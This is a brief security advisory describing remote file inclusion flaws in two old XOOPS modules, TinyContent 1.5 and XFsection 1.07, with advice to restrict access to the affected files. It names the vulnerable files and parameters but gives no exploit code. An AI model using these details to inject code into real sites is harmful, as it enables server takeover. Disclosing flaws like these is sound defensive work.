Sp[L]O1T

Name of the Vulnerable Software and Affected Versions: TinyContent module for XOOPS version 1.5 Description: A remote file inclusion issue in the TinyContent 1.5 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the `spaw root` parameter in the admin/spaw/spaw control.class.php file. Recommendations: For TinyContent module version 1.5, consider restricting access to the `spaw control.class.php` file to minimize the risk of exploitation. Avoid using the `spaw root` parameter in the affected API endpoint until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

Name of the Vulnerable Software and Affected Versions: XOOPS module XFsection version 1.07 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the `dir module` parameter in the modify.php file of the XFsection module. Recommendations: For XOOPS module XFsection version 1.07, consider restricting access to the modify.php file until a patch is available, and avoid using the `dir module` parameter in the affected module to minimize the risk of exploitation.